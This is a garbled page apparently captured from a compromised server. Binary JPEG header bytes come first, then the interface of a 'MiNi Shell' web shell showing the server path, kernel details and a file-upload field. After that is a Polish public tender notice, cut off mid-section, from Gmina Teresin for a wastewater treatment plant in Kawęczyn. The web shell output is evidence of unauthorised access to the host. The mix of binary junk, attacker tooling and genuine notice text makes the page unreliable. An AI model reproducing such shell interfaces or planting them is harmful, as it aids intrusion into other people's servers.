JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240513/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240513/0032138201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oczyszczalni ścieków w miejscowości Kawęczyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TERESIN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148532</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ZIELONA 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Teresin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-515</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL926 - Żyrardowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 46 864 25 39</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.publiczne@teresin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://josephine.proebiz.com/pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oczyszczalni ścieków w miejscowości Kawęczyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04d3a580-1106-11ef-b4f6-06f4b0c1d0b5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00321382</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00013028/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Budowa oczyszczalni ścieków w miejscowości Kawęczyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji (nie dotyczy to oferty i dokumentów wraz z nią składanych przed upływem terminu składania ofert określonego w SWZ): 1). za pośrednictwem modułu<br/>komunikacyjnego systemu JOSEPHINE, zwanego dalej „Systemem” znajdującego się pod adresem: https://josephine.proebiz.com/pl<br/>lub 2.) za pośrednictwem poczty elektronicznej pod adresem zam.publiczne@teresin.pl. 2.Osoba upoważniona rejestruje się w<br/>systemie JOSEPHINE, wypełniając formularz rejestracyjny na domenie https://josephine.proebiz.com, postępując w sposób określony w formularzu. Aby bezproblemowo korzystać z systemu JOSEPHINE, konieczne jest korzystanie z komputera podłączonego do internetu i przeglądarki internetowej. Szczegółowe informacje dotyczące wymagań technicznych znajdują się pod adresem https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf<br/>Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. PROEBIZ s.r.o., Masarykovo náměstí<br/>52/33, CZ - 702 00Ostrava - Moravská Ostrava, C.9176, nr tel. +48 222139 900, e-mail: houston@proebiz.com od poniedziałku do<br/>piątku (dni robocze) w godz. 8.00 – 16.00.<br/>3. Wymagania techniczne dla dokumentów elektronicznych są zawarte w Rozdziale 10 ust.10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, Zamawiający informuje, że:<br/>1) Administratorem danych osobowych Wykonawcy (podwykonawcy lub podmiotu trzeciego) jest Gmina Teresin, reprezentowana<br/>przez Wójta Gminy Teresin z siedzibą, ulica Zielona 20, 96-515 Teresin, z którym można się skontaktować: telefonicznie: +48 (46)<br/>861-38-15, za pośrednictwem<br/>poczty elektronicznej pod adresem e-mail: urzad.gminy@teresin.pl.<br/>2) Administrator wyznaczył Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych za pośrednictwem poczty elektronicznej: e-mail: ido.gminy@teresin.pl lub pisemnie<br/>na adres Urzędu Gminy Teresin, ul. Zielona<br/>20, 96–515 Teresin z dopiskiem „Inspektor Ochrony Danych”.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym, a podstawą przetwarzania jest<br/>obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień spoczywających na Zamawiających, zgodnie z<br/>ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych, zwaną dalej ustawą Pzp.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy Pzp. Szczegółowe informacje zawarte są w Rozdziale 26 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.042.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie zadania pn. „Budowa oczyszczalni ścieków w miejscowości Kawęczyn”.<br/>2.	Opis inwestycji: Oczyszczalnia ścieków Kawęczyn obsługiwać będzie peryferyjne miejscowości gminy (do centrum ~8 km, do infrastruktury społecznej - szkoła, ośrodek zdrowia ~4 km); Na terenie jest otoczony polami blok mieszkalny i czworaki pracowników dawnej Stacji Oceny Odmian w Gołębiewie filia Kawęczyn (~200 osób). Inwestycja zgłaszana od kilku lat przez radę sołecką i sołtysów była odkładana ze względu na peryferyjność położenia i stosunkowo wysokie koszty w przeliczeniu na liczbę bezpośrednich beneficjentów. Spodziewany efekt: Kompleksowe rozwiązanie gospodarki ściekowej na dawnym osiedlu pracowników Stacji Oceny Odmian (siedziba w Gołębiewie). Inwestycja realizuje ideę zrównoważonego rozwoju w trzech aspektach: 1) podłączenie do oczyszczalni ścieków wyrównuje warunki życia mieszkańców wsi i miasta; 2) budowa biologiczno-mechanicznej oczyszczalni ścieków ogranicza negatywny wpływ człowieka na środowisko; 3) zapewnia zrównoważony rozwój całego terytorium gminy poprzez inwestycję w peryferyjną wieś. Do tej pory inwestycje w Kawęczynie przegrywały z potrzebami centralnie położonych wsi, służącymi większej liczbie osób, tańszymi per capita. Ilość ścieków poddawanych oczyszczaniu na dobę dzięki podłączeniom do nowej kanalizacji: 24.000 litrów/dobę (założenie 160 l /osobę/dobę) – realizacja zadania generuje korzyści dodatkowo dla mieszkańców gminy Sochaczew, Nowa Sucha i miasta Sochaczew dzięki ochronie wód rzeki Pisi, jako efektu budowy oczyszczalni w Kawęczynie. Budowa nowoczesnej oczyszczalni ścieków stanowi nie tylko inwestycję w komfort życia mieszkańców. Należy traktować ją przede wszystkim jako inwestycję w ochronę ziemi i wód, ograniczającą skutki nieograniczonego korzystania ze środowiska i przeciwdziałanie awariom technicznym, których skutki mogą zagrażać życiu lub zdrowiu osób i środowisku. Zaniechanie realizacji zadania to zagrożenie dla wód rzeki Pisi i Bzury, do której wpływa. Inwestycja w pełni przygotowana formalnie: pełna dokumentacja projektowa wraz z pozwoleniem na budowę.<br/>3.	Szczegółowy zakres zamówienia obejmuje: <br/>1)	budowę na działce nr ewidencyjny 3/6, obręb geodezyjny SHRO Kawęczyn, mechaniczno - biologicznej oczyszczalni ścieków do obsługi 150 RLM; <br/>2)	budowę sieci kanalizacji sanitarnej ścieków surowych i oczyszczonych w obrębie SHRO Kawęczyn (dz. nr ewid. 2, 3/6, 3/7, 4/11, 4/12, 5 i 6 obręb geodezyjny SHRO Kawęczyn), o łącznej długości 927,30 mb. <br/>4. Szczegółowy opis przedmiotu zamówienia zawarty jest w Rozdziale 3 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45315100-9 - Instalacyjne roboty elektrotechniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium nr 1 – CENA:<br/> <br/>Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym. Zamawiający ofercie o najniższej cenie przyzna 60 punktów (wartość punktowa obliczona z dokładnością do dwóch miejsc po przecinku), a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/>Cena = najniższa oferowana cena brutto (zł) / cena badanej oferty brutto (zł) x 60 pkt.<br/><br/>Kryterium nr 2 – OKRES GWARANCJI JAKOŚCI: <br/><br/>Kryterium „Okres gwarancji jakości” będzie rozpatrywane na podstawie zadeklarowanego przez Wykonawcę w formularzu ofertowym okresu gwarancji. Minimalny okres gwarancji wynosi 36 miesiący, licząc od daty odbioru końcowego, maksymalny 60 miesięcy licząc od daty odbioru końcowego. W przypadku, gdy Wykonawca zadeklaruje dłuższy niż 60 miesięczny okres gwarancji, ocenie będzie podlegał okres 60 miesięczny. Natomiast w przypadku gdy Wykonawca zadeklaruje krótszy niż 36 miesięczny okres gwarancji, oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>Zamawiający ofercie o najdłuższym okresie gwarancji jakości przyzna 40 punktów (wartość punktowa obliczona z dokładnością do dwóch miejsc po przecinku), a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/>Okres gwarancji jakości = okres gwarancji badanej oferty / najdłuższy okres gwarancji spośród złożonych ofert x 40 pkt.<br/><br/>Łączna punktacja jest sumą punktów uzyskanych w kryteriach: ceny i okresu gwarancji jakości.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów uzyskanych w w/w kryteriach. <br/><br/>Jeżeli nie będzie można dokonać wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a) Wykonawca jest zobowiązany wykazać, że nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał jedną robotę budowlaną, która polegała na budowie (przez budowę należy przez to rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego) lub przebudowie oczyszczalni ścieków o przepustowości średniodobowej Qdśr wynoszącej minimum 10 m3/dobę, w zakres której wchodziło wykonanie kompletnego reaktora biologicznego wraz z wyposażeniem technologicznym. Wartość roboty nie może być niższa niż 800.000,00 zł brutto (słownie złotych: osiemset tysięcy i 00/100). <br/>Wyżej wymieniony warunek odnosi się do wykonawcy składającego ofertę samodzielnie, co najmniej jednego ze wspólników konsorcjum (w przypadku wspólnej oferty) lub podmiotu udostępniającego zasoby wykonawcy, jeżeli wykonawca powołuje się na te zasoby. Nie podlegają sumowaniu wartości robót wykonywanych przez różne podmioty biorące udział w postępowaniu tj. wspólników konsorcjum, ani wykonawcy i podmiotu udostępniającego zasoby.<br/>b)	Wykonawca jest zobowiązany wykazać, że nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wybudował w ramach jednej lub dwóch robót budowlanych (przez budowę należy przez to rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego) sieć kanalizacji sanitarnej o łącznej długości nie mniejszej niż 600,00 mb. <br/>Wyżej wymieniony warunek odnosi się do wykonawcy składającego ofertę samodzielnie, co najmniej jednego ze wspólników konsorcjum (w przypadku wspólnej oferty) lub podmiotu udostępniającego zasoby wykonawcy, jeżeli wykonawca powołuje się na te zasoby. Nie podlegają sumowaniu wartości robót wykonywanych przez różne podmioty biorące udział w postępowaniu tj. wspólników konsorcjum, ani wykonawcy i podmiotu udostępniającego zasoby.<br/>c) Wykonawca jest zobowiązany wykazać, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jaka zostanie im powierzona: <br/>- Wykonawca jest zobowiązany wykazać, że dysponuje 1 osobą do pełnienia funkcji Kierownika Budowy, która będzie uczestniczyła w wykonywaniu zamówienia, która posiada wymagane kwalifikacje zawodowe , tj. uprawnienia w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń kanalizacyjnych do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami, w zakresie odpowiadającym przedmiotowi zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2023 poz. 682 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, uzyskane w oparciu o przepisy obowiązujące przed wejściem w życie w/w ustawy oraz minimalne doświadczenie z okresu ostatnich 5 lat, tj. doświadczenie przy realizacji robót budowlanych na co najmniej jednym zakończonym zamówieniu odpowiadającemu swoim rodzajem przedmiotowi zamówienia, gdzie zakres obowiązków podanej osoby odpowiadał zakresowi obowiązków kierownika budowy zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane.<br/>Za zamówienie odpowiadające swoim rodzajem przedmiotowi zamówienia uważa się robotę budowlaną polegającą na budowie (przez budowę należy przez to rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego) lub przebudowie oczyszczalni ścieków o przepustowości średniodobowej Qdśr wynoszącej minimum 10 m3/dobę;<br/>- Wykonawca jest zobowiązany wykazać, że dysponuje 1 osobą do pełnienia funkcji Kierownika robót w specjalności konstrukcyjno - budowlanej, która będzie uczestniczyła w wykonywaniu zamówienia, która posiada wymagane kwalifikacje zawodowe, tj. uprawnienia w specjalności konstrukcyjno - budowlanej do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami, w zakresie odpowiadającym przedmiotowi zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, uzyskane w oparciu o przepisy obowiązujące przed wejściem w życie w/w ustawy;<br/>- Wykonawca jest zobowiązany wykazać, że dysponuje 1 osobą do pełnienia funkcji Kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych, tj. uprawnienia w specjalności instalacyjnej zakresie sieci, instalacji i urządzeń elektrycznych do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami, w zakresie odpowiadającym przedmiotowi zamówienia wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, uzyskane w oparciu o przepisy obowiązujące przed wejściem w życie w/w ustawy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowania, Wykonawca na wezwanie zamawiającego<br/>zobowiązany będzie złożyć następujące dokumenty i oświadczenia:<br/>1) wykaz robót budowlanych, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane. Wykonawca jest zobowiązany załączyć<br/>dowody określające, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego i odpowiedzialnych za kierowanie robotami<br/>budowlanymi i spełniających wymagania określone w Rozdziale 17 SWZ wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie ze wzorem zamieszczonym w załączniku nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: 